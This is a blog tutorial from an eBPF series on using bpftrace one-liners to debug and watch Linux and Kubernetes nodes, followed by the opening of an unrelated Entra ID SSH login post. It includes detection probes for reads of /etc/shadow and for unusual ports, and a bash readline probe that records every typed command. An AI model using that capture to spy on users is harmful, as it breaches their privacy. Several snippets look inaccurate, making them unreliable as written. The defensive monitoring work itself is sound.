pre[data-lang="python"],pre[data-lang="go"],pre[data-lang="rust"],
pre[data-lang="java"],pre[data-lang="c"],pre[data-lang="cpp"]{border-left-color:#c586c0}
pre[data-lang="text"],pre[data-lang="output"],
pre[data-lang="console"]{border-left-color:#888}
.lc-copy-btn{position:absolute;top:8px;right:8px;background:#2d2d2d;color:#ccc;
    border:1px solid #444;border-radius:4px;padding:3px 9px;font-size:.75em;
    font-family:system-ui,sans-serif;cursor:pointer;opacity:0;
    transition:opacity .15s,background .15s;line-height:1.6}
pre:hover .lc-copy-btn{opacity:1}
.lc-copy-btn:hover{background:#3a3a3a;color:#fff}
.lc-copy-btn.copied{color:#4ec9b0;border-color:#4ec9b0}
.lc-lang-badge{position:absolute;top:8px;left:20px;font-family:system-ui,sans-serif;
    font-size:.7em;color:#666;text-transform:uppercase;letter-spacing:.04em;
    line-height:1;pointer-events:none;opacity:0;transition:opacity .15s}
pre:hover .lc-lang-badge{opacity:1}
table{border-collapse:collapse;width:100%;margin:16px 0}
th,td{border:1px solid #ddd;padding:10px 14px;text-align:left}
th{background:#f0f0f0;font-weight:600}
tr:nth-child(even){background:#fafafa}
</style>
<p><script>
(function(){
  if(window.__lcCodeEnhanced)return;
  window.__lcCodeEnhanced=true;
  function enhance(){
    document.querySelectorAll('pre').forEach(function(pre){
      var code=pre.querySelector('code');
      var lang='';
      if(code){var m=(code.className||'').match(/language-(\S+)/);if(m)lang=m[1].toLowerCase();}
      if(lang)pre.setAttribute('data-lang',lang);
      if(lang){var badge=document.createElement('span');badge.className='lc-lang-badge';badge.textContent=lang;pre.insertBefore(badge,pre.firstChild);}
      var btn=document.createElement('button');
      btn.className='lc-copy-btn';btn.textContent='Copy';btn.setAttribute('aria-label','Copy code to clipboard');
      pre.appendChild(btn);
      btn.addEventListener('click',function(){
        var text=code?code.innerText:pre.innerText;
        if(navigator.clipboard&&window.isSecureContext){
          navigator.clipboard.writeText(text).then(function(){ok(btn);}).catch(function(){fb(text,btn);});
        }else{fb(text,btn);}
      });
    });
  }
  function ok(btn){btn.textContent='Copied!';btn.classList.add('copied');setTimeout(function(){btn.textContent='Copy';btn.classList.remove('copied');},2000);}
  function fb(text,btn){
    try{var ta=document.createElement('textarea');ta.value=text;ta.style.cssText='position:fixed;left:-9999px;top:-9999px;opacity:0';document.body.appendChild(ta);ta.select();document.execCommand('copy');document.body.removeChild(ta);ok(btn);}
    catch(e){btn.textContent='✗ Failed';setTimeout(function(){btn.textContent='Copy';},2000);}
  }
  if(document.readyState==='loading'){document.addEventListener('DOMContentLoaded',enhance);}else{enhance();}
})();
</script></p>
<p><em>eBPF: From Kernel to Cloud, Episode 9</em><br />
<em><a href="https://linuxcent.com/what-is-ebpf-linux-kubernetes/">What Is eBPF?</a> · <a href="https://linuxcent.com/bpf-verifier-kubernetes-safety/">The BPF Verifier</a> · <a href="https://linuxcent.com/ebpf-vs-kernel-modules-kubernetes/">eBPF vs Kernel Modules</a> · <a href="https://linuxcent.com/ebpf-program-types-kubernetes/">eBPF Program Types</a> · <a href="https://linuxcent.com/ebpf-maps-explained/">eBPF Maps</a> · <a href="https://linuxcent.com/ebpf-co-re-libbpf-portable-programs/">CO-RE and libbpf</a> · <a href="https://linuxcent.com/ebpf-xdp-kubernetes-networking/">XDP</a> · <a href="https://linuxcent.com/ebpf-tc-pod-policy/">TC eBPF</a> · </em><em>bpftrace</em>**</p>
<hr />
<p style="font-size:0.72em;font-weight:700;letter-spacing:0.12em;color:#f59e0b;text-transform:uppercase;margin:2em 0 0.75em 0;text-align:center;">Architecture Overview</p>
<figure class="wp-block-image size-full" style="margin:0 0 0.5em 0;">
<img loading="lazy" decoding="async" width="2091" height="2560" src="https://linuxcent.com/wp-content/uploads/2026/05/ep09-bpftrace-og-2-scaled.png" alt="bpftrace and eBPF Tracing — dynamic kernel observability showing probe types and output pipeline" class="wp-image-2117" style="width:100%;height:auto;display:block;border-radius:8px;" srcset="https://linuxcent.com/wp-content/uploads/2026/05/ep09-bpftrace-og-2-scaled.png 2091w, https://linuxcent.com/wp-content/uploads/2026/05/ep09-bpftrace-og-2-245x300.png 245w, https://linuxcent.com/wp-content/uploads/2026/05/ep09-bpftrace-og-2-836x1024.png 836w, https://linuxcent.com/wp-content/uploads/2026/05/ep09-bpftrace-og-2-768x940.png 768w, https://linuxcent.com/wp-content/uploads/2026/05/ep09-bpftrace-og-2-1255x1536.png 1255w, https://linuxcent.com/wp-content/uploads/2026/05/ep09-bpftrace-og-2-1673x2048.png 1673w" sizes="auto, (max-width: 2091px) 100vw, 2091px" /><figcaption style="text-align:center;font-size:0.85em;color:#6b7280;margin-top:0.75em;">bpftrace attaches probes at runtime — no recompilation, no restarts, full kernel visibility in one line.</figcaption></figure>
<hr style="border:none;border-top:1px solid #e5e7eb;margin:0.5em 0 2em 0;"/>
<h2 id="tldr">TL;DR</h2>
<ul>
<li>bpftrace is an eBPF compiler, not a monitoring agent — every one-liner compiles, loads, runs, and cleans up a complete kernel program<br />
<em>(think of it like <code class="" data-line="">kubectl exec</code> — but for asking the kernel a direct question, with no agent, no sidecar, no prior setup)</em></li>
<li>kretprobe and tracepoint cover most production debugging needs; use tracepoints for stability across kernel versions</li>
<li>The security use cases are unique: kernel-level observation that an attacker inside a container cannot suppress</li>
<li>Every connection, every file open, every process spawn — observable in real time with a single command, no prior instrumentation</li>
<li>Production caution: high-frequency probes on hot paths add overhead; filter by pid/comm, use <code class="" data-line="">--timeout</code>, watch <code class="" data-line="">%si</code></li>
<li>Container PIDs are host-namespace PIDs in bpftrace — use <code class="" data-line="">curtask-&gt;real_parent-&gt;tgid</code> to correlate to container activity</li>
</ul>
<hr />
<p>bpftrace turns any kernel question into a one-liner — compiling, loading, and attaching a complete eBPF program in seconds, with no agents, no restarts, and no prior instrumentation on the node. When something is wrong on a node right now and you don&#8217;t know where to look, it&#8217;s how you ask the kernel a direct question. That&#8217;s what EP09 is about.</p>
<h2 id="quick-check-is-bpftrace-available-on-your-node">Quick Check: Is bpftrace Available on Your Node?</h2>
<p>Before the one-liner toolkit — verify bpftrace is installed and working on a cluster node:</p>
<pre><code class="" data-line=""># SSH into a worker node, then:
bpftrace --version
# bpftrace v0.19.0   ← any version ≥ 0.16 supports the patterns in this episode

# Verify BTF is available (required for struct access one-liners)
ls /sys/kernel/btf/vmlinux &amp;&amp; echo &quot;BTF available&quot;

# The simplest possible one-liner — count syscalls for 5 seconds
bpftrace -e &#039;tracepoint:raw_syscalls:sys_enter { @[comm] = count(); }&#039; --timeout 5
</code></pre>
<p>Expected output (abridged):</p>
<pre><code class="" data-line="">Attaching 1 probe...

@[containerd]: 312
@[kubelet]:    841
@[node_exporter]: 203
@[sshd]:       47
</code></pre>
<p>Each line is a process name and how many syscalls it made in 5 seconds. If this runs and produces output, everything in this episode will work on your node.</p>
<blockquote>
<p><strong>Not on a self-managed node?</strong> EKS managed nodes and GKE nodes don&#8217;t have bpftrace pre-installed, but you can run it from a privileged debug pod: <code class="" data-line="">kubectl debug node/&lt;node-name&gt; -it --image=quay.io/iovisor/bpftrace</code>. The tool runs on the host kernel — you get full kernel visibility even from a pod.</p>
</blockquote>
<hr />
<p>A node in production started showing elevated TCP latency — p99 at 180ms, where p99 was normally under 10ms. The application logs were clean. The APM dashboard showed nothing unusual at the service level. CPU, memory, disk: all normal. The load balancer health checks were passing.</p>
<p>I had 12 minutes before the on-call escalation would have gone to the application team and started a war room.</p>
<p>I ran one command:</p>
<pre><code class="" data-line="">bpftrace -e &#039;kretprobe:tcp_recvmsg { @bytes[comm] = hist(retval); }&#039; --timeout 10
</code></pre>
<p>Ten seconds of sampling. The histogram output showed a single process — <code class="" data-line="">backup-agent</code> — receiving 4MB chunks at irregular intervals. Not the application. Not the service mesh. A backup agent that runs at the infrastructure layer, saturating the receive path with large reads during its scheduled window.</p>
<p>Found in 9 seconds. War room averted.</p>
<p>What made that possible is something most engineers don&#8217;t know about bpftrace: that one-liner is not a monitoring query. It&#8217;s a complete eBPF program — compiled, loaded into the kernel, attached to the <code class="" data-line="">tcp_recvmsg</code> kernel return probe, run, and cleaned up — all in ten seconds. bpftrace is a compiler that happens to have a very convenient command-line interface.</p>
<hr />
<h2 id="what-bpftrace-actually-is">What bpftrace Actually Is</h2>
<p>bpftrace is not a monitoring tool. It&#8217;s an eBPF compiler with a high-level scripting language designed for one-shot investigation.</p>
<p>When you run <code class="" data-line="">bpftrace -e &#039;kretprobe:tcp_recvmsg { ... }&#039;</code>, this is what happens:</p>
<pre><code class="" data-line="">Your one-liner
      ↓
bpftrace&#039;s built-in LLVM/Clang frontend
      ↓
eBPF bytecode (.bpf.o in memory)
      ↓
Kernel verifier validates the program
      ↓
JIT compiler compiles to native machine code
      ↓
Program attaches to tcp_recvmsg kretprobe
      ↓
Runs until Ctrl-C or --timeout
      ↓
Output printed, maps freed, program detached
</code></pre>
<p>The kernel doesn&#8217;t know bpftrace wrote the program. It&#8217;s the same path as Falco, Cilium, Tetragon — kernel program loaded via the BPF syscall, verified, JIT-compiled, attached to a probe. bpftrace just wraps that entire process in a scripting language that takes 30 seconds to write instead of an afternoon.</p>
<p>This is why bpftrace can answer questions that no other tool can: it compiles to a kernel-level observer that fires on any event in the kernel, on any process, on any container — without any prior instrumentation.</p>
<hr />
<h2 id="the-four-probe-types-youll-use-most">The Four Probe Types You&#8217;ll Use Most</h2>
<p>bpftrace supports 20+ probe types. These four cover 90% of production debugging:</p>
<h3 id="kprobe-kretprobe-kernel-functions">kprobe / kretprobe — Kernel Functions</h3>
<p>Attaches to the entry (<code class="" data-line="">kprobe</code>) or return (<code class="" data-line="">kretprobe</code>) of any kernel function. The most powerful probes for understanding what the kernel is actually doing.</p>
<pre><code class="" data-line=""># Fire on every call to tcp_connect — who&#039;s making new TCP connections?
bpftrace -e &#039;kprobe:tcp_connect { printf(&quot;%s PID %d connecting\n&quot;, comm, pid); }&#039;

# On return from tcp_recvmsg — how large are the reads per process?
bpftrace -e &#039;kretprobe:tcp_recvmsg { @[comm] = hist(retval); }&#039;

# Count calls to vfs_write per process (file write activity)
bpftrace -e &#039;kprobe:vfs_write { @[comm] = count(); }&#039;
</code></pre>
<p>Limitation: kernel functions are internal and can change between kernel versions. Use tracepoints (below) for stability when you can.</p>
<blockquote>
<p><strong>kprobe instability:</strong> A function targeted by a kprobe can be <em>inlined</em> by the kernel compiler — the compiler embeds the function&#8217;s code at its call sites with no separate entry point. When that happens, the kprobe silently fires on nothing. Verify before relying on one: <code class="" data-line="">bpftrace -l &#039;kprobe:function_name&#039;</code> — empty response means it was inlined. Use a tracepoint equivalent instead.</p>
</blockquote>
<h3 id="tracepoint-stable-kernel-trace-points">tracepoint — Stable Kernel Trace Points</h3>
<p>Tracepoints are stable, versioned hooks explicitly placed in the kernel source. Unlike kprobes, they are part of the kernel&#8217;s public interface and guaranteed not to disappear between versions. Use these for anything you need to work reliably across a fleet with mixed kernel versions.</p>
<pre><code class="" data-line=""># Every file open — process name + filename
bpftrace -e &#039;tracepoint:syscalls:sys_enter_openat {
    printf(&quot;%s %s\n&quot;, comm, str(args-&gt;filename));
}&#039;

# Every outbound connect — process, destination IP and port
bpftrace -e &#039;tracepoint:syscalls:sys_enter_connect {
    printf(&quot;%-16s %-6d\n&quot;, comm, pid);
}&#039;

# List all available tracepoints (hundreds)
bpftrace -l &#039;tracepoint:syscalls:*&#039; | head -30
</code></pre>
<h3 id="uprobe-userspace-function-probes">uprobe — Userspace Function Probes</h3>
<p>Attaches to a specific function in a userspace binary or library. Useful for observing application behaviour without recompiling.</p>
<pre><code class="" data-line=""># What bash commands are being typed on this node?
bpftrace -e &#039;uprobe:/bin/bash:readline { printf(&quot;%s\n&quot;, str(arg0)); }&#039;

# Python function calls
bpftrace -e &#039;uprobe:/usr/bin/python3:PyObject_Call { printf(&quot;Python call: pid %d\n&quot;, pid); }&#039;
</code></pre>
<p>From a security standpoint: this is how you observe what an attacker is typing in an interactive shell they&#8217;ve obtained on your node — in real time, from the kernel, without touching the terminal session.</p>
<h3 id="interval-periodic-sampling">interval — Periodic Sampling</h3>
<p>Runs a block of code on a fixed interval. Used for aggregation and periodic stats.</p>
<pre><code class="" data-line=""># Print the top file-opening processes every 5 seconds
bpftrace -e &#039;
kprobe:vfs_open { @[comm] = count(); }
interval:s:5  { print(@); clear(@); }
&#039;
</code></pre>
<hr />
<h2 id="the-one-liner-toolkit-runnable-right-now">The One-Liner Toolkit: Runnable Right Now</h2>
<p>These run on any Linux node with BTF (kernel 5.8+, Ubuntu 20.04+, most managed K8s nodes):</p>
<pre><code class="" data-line=""># What files is every process opening right now? (30-second view)
bpftrace -e &#039;tracepoint:syscalls:sys_enter_openat {
    printf(&quot;%-16s %s\n&quot;, comm, str(args-&gt;filename));
}&#039; --timeout 30

# Who is making DNS queries? (catches queries from any container, no sidecar needed)
bpftrace -e &#039;tracepoint:net:net_dev_xmit {
    if (args-&gt;skbaddr-&gt;protocol == 0x0800) printf(&quot;%s\n&quot;, comm);
}&#039;

# Latency histogram for all read() syscalls — find the slow process
bpftrace -e &#039;
tracepoint:syscalls:sys_enter_read { @start[tid] = nsecs; }
tracepoint:syscalls:sys_exit_read  {
    $latency = nsecs - @start[tid];
    @latency[comm] = hist($latency);
    delete(@start[tid]);
}&#039; --timeout 15

# Which process is using the most CPU right now? (99Hz sampling)
bpftrace -e &#039;profile:hz:99 { @[comm] = count(); }&#039; --timeout 10

# Real-time syscall frequency — find unusual process activity
bpftrace -e &#039;tracepoint:raw_syscalls:sys_enter { @[comm, args-&gt;id] = count(); }&#039; --timeout 10 \
  | sort -k3 -rn | head -20

# New TCP connections in the last 30 seconds — source and dest
bpftrace -e &#039;kprobe:tcp_connect {
    $sk = (struct sock *)arg0;
    printf(&quot;%-16s → %s:%d\n&quot;, comm,
           ntop(AF_INET, $sk-&gt;__sk_common.skc_daddr),
           $sk-&gt;__sk_common.skc_dport &gt;&gt; 8);
}&#039; --timeout 30

# What is a specific PID doing? (replace 12345)
bpftrace -e &#039;tracepoint:syscalls:sys_enter_openat /pid == 12345/ {
    printf(&quot;%s\n&quot;, str(args-&gt;filename));
}&#039;
</code></pre>
<p>Each of these compiles and loads in under 2 seconds. They leave no persistent state. When they exit, the kernel reverts to exactly the state it was in before.</p>
<hr />
<h2 id="the-security-use-cases">The Security Use Cases</h2>
<h3 id="watching-an-active-session">Watching an Active Session</h3>
<p>If you suspect a process is running commands you didn&#8217;t deploy:</p>
<pre><code class="" data-line=""># See every bash command on this node in real time
bpftrace -e &#039;uprobe:/bin/bash:readline { printf(&quot;%s %s\n&quot;, comm, str(arg0)); }&#039;

# Every process spawn — PID, parent, command
bpftrace -e &#039;tracepoint:syscalls:sys_enter_execve {
    printf(&quot;%-6d %-6d %s\n&quot;, pid, curtask-&gt;real_parent-&gt;tgid, str(args-&gt;filename));
}&#039;
</code></pre>
<p>This is the kernel-level version of watching <code class="" data-line="">/var/log/auth.log</code> — except it can&#8217;t be suppressed by an attacker who has root, because the probe runs in kernel space. An attacker who has compromised a container with root inside the container cannot prevent a bpftrace program on the host from observing their syscalls.</p>
<h3 id="detecting-unexpected-network-activity">Detecting Unexpected Network Activity</h3>
<pre><code class="" data-line=""># Any process making a connection to a non-standard port
bpftrace -e &#039;kprobe:tcp_connect {
    $sk = (struct sock *)arg0;
    $port = $sk-&gt;__sk_common.skc_dport &gt;&gt; 8;
    if ($port != 80 &amp;&amp; $port != 443 &amp;&amp; $port != 53) {
        printf(&quot;%-16s port %d\n&quot;, comm, $port);
    }
}&#039;

# DNS queries to non-standard resolvers (anything not on port 53)
bpftrace -e &#039;tracepoint:syscalls:sys_enter_sendto {
    if (args-&gt;addr-&gt;sa_family == 2) {
        printf(&quot;%-16s → %s\n&quot;, comm, str(args-&gt;addr));
    }
}&#039;
</code></pre>
<h3 id="watching-file-access-on-sensitive-paths">Watching File Access on Sensitive Paths</h3>
<pre><code class="" data-line=""># Any access to /etc/passwd, /etc/shadow, /root/
bpftrace -e &#039;tracepoint:syscalls:sys_enter_openat {
    if (str(args-&gt;filename) == &quot;/etc/passwd&quot; ||
        str(args-&gt;filename) == &quot;/etc/shadow&quot;) {
        printf(&quot;%-16s PID %-6d opened %s\n&quot;, comm, pid, str(args-&gt;filename));
    }
}&#039;
</code></pre>
<hr />
<h2 id="production-gotchas">Production Gotchas</h2>
<p><strong>CPU overhead:</strong> bpftrace probes fire synchronously in the traced context. High-frequency probes on hot kernel paths (<code class="" data-line="">vfs_read</code>, <code class="" data-line="">sys_enter_*</code> without filtering) can add 10–20% overhead. Always test with <code class="" data-line="">--timeout</code> and watch <code class="" data-line="">%si</code> before running on a production node.</p>
<p><strong>Maps grow unbounded by default:</strong> <code class="" data-line="">@[comm] = count()</code> will accumulate an entry per unique <code class="" data-line="">comm</code> value forever in the current session. Use <code class="" data-line="">clear(@)</code> in an interval block, or set a key limit: <code class="" data-line="">@[comm] = count(); if (@[comm] &gt; 100) { clear(@comm); }</code>.</p>
<p><strong>kprobe instability:</strong> Functions targeted by kprobes can be inlined by the compiler between kernel versions, making the probe silently ineffective. If a kprobe isn&#8217;t firing, verify the function exists: <code class="" data-line="">bpftrace -l &#039;kprobe:function_name&#039;</code>. If it returns nothing, the function was inlined. Use a tracepoint equivalent instead.</p>
<p><strong>Container PIDs:</strong> PIDs inside a container are different from host PIDs. <code class="" data-line="">pid</code> in bpftrace is the host namespace PID.</p>
<blockquote>
<p><strong>Container PID semantics:</strong> When a container shows PID 1 internally, the host kernel sees it as PID 8432 (or whatever was assigned). bpftrace&#8217;s <code class="" data-line="">pid</code> built-in always gives you the <em>host-namespace</em> PID. To map a container&#8217;s PID to the host PID: <code class="" data-line="">cat /proc/&lt;host-pid&gt;/status | grep NSpid</code> — the second value is the PID inside the container. Or use <code class="" data-line="">curtask-&gt;real_parent-&gt;tgid</code> in your probe to walk the process tree. This matters when you filter by <code class="" data-line="">pid</code> in a one-liner and get no output — you may be filtering on the container-namespace PID instead of the host one.</p>
</blockquote>
<p><strong>BTF requirement:</strong> bpftrace requires BTF for struct field access (<code class="" data-line="">$sk-&gt;__sk_common.skc_daddr</code>). If BTF is unavailable, struct access fails. Check <code class="" data-line="">/sys/kernel/btf/vmlinux</code> exists before running struct-access one-liners.</p>
<hr />
<h2 id="quick-reference">Quick Reference</h2>
<table>
<thead>
<tr>
<th>Probe type</th>
<th>Syntax</th>
<th>Use for</th>
</tr>
</thead>
<tbody>
<tr>
<td>kernel function entry</td>
<td><code class="" data-line="">kprobe:function_name</code></td>
<td>Function arguments</td>
</tr>
<tr>
<td>kernel function return</td>
<td><code class="" data-line="">kretprobe:function_name</code></td>
<td>Return value, latency</td>
</tr>
<tr>
<td>kernel tracepoint</td>
<td><code class="" data-line="">tracepoint:subsys:name</code></td>
<td>Stable, versioned hooks</td>
</tr>
<tr>
<td>userspace function</td>
<td><code class="" data-line="">uprobe:/path/to/bin:function</code></td>
<td>App-level observation</td>
</tr>
<tr>
<td>CPU sampling</td>
<td><code class="" data-line="">profile:hz:99</code></td>
<td>Flamegraphs, hot code</td>
</tr>
<tr>
<td>interval</td>
<td><code class="" data-line="">interval:s:N</code></td>
<td>Periodic aggregation</td>
</tr>
<tr>
<td>process start</td>
<td><code class="" data-line="">tracepoint:syscalls:sys_enter_execve</code></td>
<td>New process detection</td>
</tr>
</tbody>
</table>
<table>
<thead>
<tr>
<th>Built-in variable</th>
<th>Value</th>
</tr>
</thead>
<tbody>
<tr>
<td><code class="" data-line="">pid</code></td>
<td>Process ID (host namespace)</td>
</tr>
<tr>
<td><code class="" data-line="">tid</code></td>
<td>Thread ID</td>
</tr>
<tr>
<td><code class="" data-line="">comm</code></td>
<td>Process name (15 chars)</td>
</tr>
<tr>
<td><code class="" data-line="">nsecs</code></td>
<td>Nanoseconds since boot</td>
</tr>
<tr>
<td><code class="" data-line="">curtask</code></td>
<td>Pointer to <code class="" data-line="">task_struct</code></td>
</tr>
<tr>
<td><code class="" data-line="">retval</code></td>
<td>Return value (kretprobe/tracepoint exit)</td>
</tr>
<tr>
<td><code class="" data-line="">args</code></td>
<td>Probe arguments struct</td>
</tr>
</tbody>
</table>
<hr />
<h2 id="key-takeaways">Key Takeaways</h2>
<ul>
<li>bpftrace is an eBPF compiler, not a monitoring agent — every one-liner compiles, loads, runs, and cleans up a complete kernel program</li>
<li>kretprobe and tracepoint cover most production debugging needs; use tracepoints for stability across kernel versions</li>
<li>The security use cases are unique: kernel-level observation that an attacker inside a container cannot suppress, because the probe runs on the host in kernel space</li>
<li>Every connection, every file open, every process spawn — observable in real time with a single command, no prior instrumentation</li>
<li>Production caution: high-frequency probes on hot paths add overhead; filter by pid/comm, use <code class="" data-line="">--timeout</code>, watch <code class="" data-line="">%si</code></li>
</ul>
<hr />
<h2 id="whats-next">What&#8217;s Next</h2>
<p>bpftrace answers questions you ask in the moment. EP10 covers what happens when you need those answers continuously — not as a one-shot investigation tool, but as persistent telemetry recording every network connection across your entire cluster.</p>
<p>Flow observability from TC hooks is the always-on version: a persistent eBPF program recording every connection attempt, every retransmit, every dropped packet — the ground truth layer that everything above it interprets. When your APM says &#8220;timeout&#8221; and the kernel says &#8220;retransmit storm to one specific endpoint,&#8221; the kernel is right.</p>
<p><em>Next: <a href="/ebpf-network-flow-observability/">network flow observability at the kernel level</a></em></p>
<p>Get EP10 in your inbox when it publishes → <a href="https://linuxcent.com/subscribe">linuxcent.com/subscribe</a></p>
<p><a class="a2a_button_mastodon" href="https://www.addtoany.com/add_to/mastodon?linkurl=https%3A%2F%2Flinuxcent.com%2Fbpftrace-kernel-observability%2F&amp;linkname=bpftrace%20%E2%80%94%20Kernel%20Answers%20in%20One%20Line" title="Mastodon" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Flinuxcent.com%2Fbpftrace-kernel-observability%2F&amp;linkname=bpftrace%20%E2%80%94%20Kernel%20Answers%20in%20One%20Line" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_whatsapp" href="https://www.addtoany.com/add_to/whatsapp?linkurl=https%3A%2F%2Flinuxcent.com%2Fbpftrace-kernel-observability%2F&amp;linkname=bpftrace%20%E2%80%94%20Kernel%20Answers%20in%20One%20Line" title="WhatsApp" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Flinuxcent.com%2Fbpftrace-kernel-observability%2F&amp;linkname=bpftrace%20%E2%80%94%20Kernel%20Answers%20in%20One%20Line" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_x" href="https://www.addtoany.com/add_to/x?linkurl=https%3A%2F%2Flinuxcent.com%2Fbpftrace-kernel-observability%2F&amp;linkname=bpftrace%20%E2%80%94%20Kernel%20Answers%20in%20One%20Line" title="X" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Flinuxcent.com%2Fbpftrace-kernel-observability%2F&amp;linkname=bpftrace%20%E2%80%94%20Kernel%20Answers%20in%20One%20Line" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_copy_link" href="https://www.addtoany.com/add_to/copy_link?linkurl=https%3A%2F%2Flinuxcent.com%2Fbpftrace-kernel-observability%2F&amp;linkname=bpftrace%20%E2%80%94%20Kernel%20Answers%20in%20One%20Line" title="Copy Link" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share#url=https%3A%2F%2Flinuxcent.com%2Fbpftrace-kernel-observability%2F&#038;title=bpftrace%20%E2%80%94%20Kernel%20Answers%20in%20One%20Line" data-a2a-url="https://linuxcent.com/bpftrace-kernel-observability/" data-a2a-title="bpftrace — Kernel Answers in One Line"></a></p><p>The post <a href="https://linuxcent.com/bpftrace-kernel-observability/">bpftrace — Kernel Answers in One Line</a> appeared first on <a href="https://linuxcent.com">Linuxcent</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://linuxcent.com/bpftrace-kernel-observability/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">1839</post-id>	</item>
		<item>
		<title>Entra ID Linux Login: SSH Authentication with Azure AD Credentials</title>
		<link>https://linuxcent.com/entra-id-linux-login/</link>
					<comments>https://linuxcent.com/entra-id-linux-login/#respond</comments>
		
		<dc:creator><![CDATA[Vamshi Krishna Santhapuri]]></dc:creator>
		<pubDate>Sat, 09 May 2026 02:00:00 +0000</pubDate>
				<category><![CDATA[Identity & Authentication]]></category>
		<category><![CDATA[Authentication]]></category>
		<category><![CDATA[Azure AD]]></category>
		<category><![CDATA[Cloud Security]]></category>
		<category><![CDATA[Entra ID]]></category>
		<category><![CDATA[Identity Management]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[SSH]]></category>
		<guid isPermaLink="false">https://linuxcent.com/?p=1805</guid>

					<description><![CDATA[<p><span class="span-reading-time rt-reading-time" style="display: block;"><span class="rt-label rt-prefix">Reading Time: </span> <span class="rt-time"> 6</span> <span class="rt-label rt-postfix">minutes</span></span>Enable Entra ID SSH login on Linux: aad-auth package, Conditional Access Policies, pam_aad stack, and Entra ID Connect for hybrid on-prem sync.</p>
<p>The post <a href="https://linuxcent.com/entra-id-linux-login/">Entra ID Linux Login: SSH Authentication with Azure AD Credentials</a> appeared first on <a href="https://linuxcent.com">Linuxcent</a>.</p>
]]></description>
										<content:encoded><![CDATA[<span class="span-reading-time rt-reading-time" style="display: block;"><span class="rt-label rt-prefix">Reading Time: </span> <span class="rt-time"> 6</span> <span class="rt-label rt-postfix">minutes</span></span><style>
pre{position:relative;background:#1e1e1e;color:#d4d4d4;
    padding:16px 16px 16px 20px;border-radius:6px;overflow-x:auto;
    font-family:'JetBrains Mono','Fira Code','Cascadia Code',Consolas,'Courier New',monospace;
    font-size:.88em;line-height:1.6;border-left:4px solid #555}
code{background:#f4f4f4;padding:2px 5px;border-radius:3px;font-size:.9em}
pre code{background:transparent;padding:0;color:inherit}
pre[data-lang="bash"],pre[data-lang="sh"],
pre[data-lang="shell"],pre[data-lang="zsh"]{border-left-color:#4ec9b0}
pre[data-lang="yaml"],pre[data-lang="json"],
pre[data-lang="toml"],pre[data-lang="xml"]{border-left-color:#569cd6}
pre[data-lang="python"],pre[data-lang="go"],pre[data-lang="rust"],
pre[data-lang="java"],pre[data-lang="c"],pre[data-lang="cpp"]{border-left-color:#c586c0}
pre[data-lang="text"],pre[data-lang="output"],
pre[data-lang="console"]{border-left-color:#888}
.lc-copy-btn{position:absolute;top:8px;right:8px;background:#2d2d2d;color:#ccc;
    border:1px solid #444;border-radius:4px;padding:3px 9px;font-size:.75em;
    font-family:system-ui,sans-serif;cursor:pointer;opacity:0;
    transition:opacity .15s,background .15s;line-height:1.6}
pre:hover .lc-copy-btn{opacity:1}
.lc-copy-btn:hover{background:#3a3a3a;color:#fff}
.lc-copy-btn.copied{color:#4ec9b0;border-color:#4ec9b0}
.lc-lang-badge{position:absolute;top:8px;left:20px;font-family:system-ui,sans-serif;
    font-size:.7em;color:#666;text-transform:uppercase;letter-spacing:.04em;
    line-height:1;pointer-events:none;opacity:0;transition:opacity .15s}
pre:hover .lc-lang-badge{opacity:1}
table{border-collapse:collapse;width:100%;margin:16px 0}
th,td{border:1px solid #ddd;padding:10px 14px;text-align:left}
th{background:#f0f0f0;font-weight:600}
tr:nth-child(even){background:#fafafa}
</style>
<p><script>
(function(){
  if(window.__lcCodeEnhanced)return;
  window.__lcCodeEnhanced=true;
  function enhance(){
    document.querySelectorAll('pre').forEach(function(pre){
      var code=pre.querySelector('code');
      var lang='';
      if(code){var m=(code.className||'').match(/language-(\S+)/);if(m)lang=m[1].toLowerCase();}
      if(lang)pre.setAttribute('data-lang',lang);
      if(lang){var badge=document.createElement('span');badge.className='lc-lang-badge';badge.textContent=lang;pre.insertBefore(badge,pre.firstChild);}
      var btn=document.createElement('button');
      btn.className='lc-copy-btn';btn.textContent='Copy';btn.setAttribute('aria-label','Copy code to clipboard');
      pre.appendChild(btn);
      btn.addEventListener('click',function(){
        var text=code?code.innerText:pre.innerText;
        if(navigator.clipboard&&window.isSecureContext){
          navigator.clipboard.writeText(text).then(function(){ok(btn);}).catch(function(){fb(text,btn);});
        }else{fb(text,btn);}
      });
    });
  }
  function ok(btn){btn.textContent='Copied!';btn.classList.add('copied');setTimeout(function(){btn.textContent='Copy';btn.classList.remove('copied');},2000);}
  function fb(text,btn){
    try{var ta=document.createElement('textarea');ta.value=text;ta.style.cssText='position:fixed;left:-9999px;top:-9999px;opacity:0';document.body.appendChild(ta);ta.select();document.execCommand('copy');document.body.removeChild(ta);ok(btn);}
    catch(e){btn.textContent='✗ Failed';setTimeout(function(){btn.textContent='Copy';},2000);}
  }
  if(document.readyState==='loading'){document.addEventListener('DOMContentLoaded',enhance);}else{enhance();}
})();
</script></p>
<p><em>The Identity Stack, Episode 12</em><br />
<a href="/identity-providers-explained/">EP11: Identity Providers</a> → <strong>EP12</strong> → <a href="/zero-trust-identity-spiffe-spire/">EP13: Zero Trust Identity</a> → &#8230;</p>
<hr />
<h2 id="tldr">TL;DR</h2>
<ul>
<li>Entra ID (Azure AD) Linux login lets you SSH into a VM using your Azure AD credentials — no local Linux accounts, no SSH keys to distribute</li>
<li>The stack: <code class="" data-line="">aad-auth</code> package + <code class="" data-line="">pam_aad.so</code> + SSSD — Azure authenticates via OIDC device code flow or password, then maps the identity to a local Linux UID</li>
<li>Entra ID is not AD — it&#8217;s OIDC/OAuth2 native, with no LDAP and no Kerberos (unless you add Azure AD DS, a separate managed service)</li>
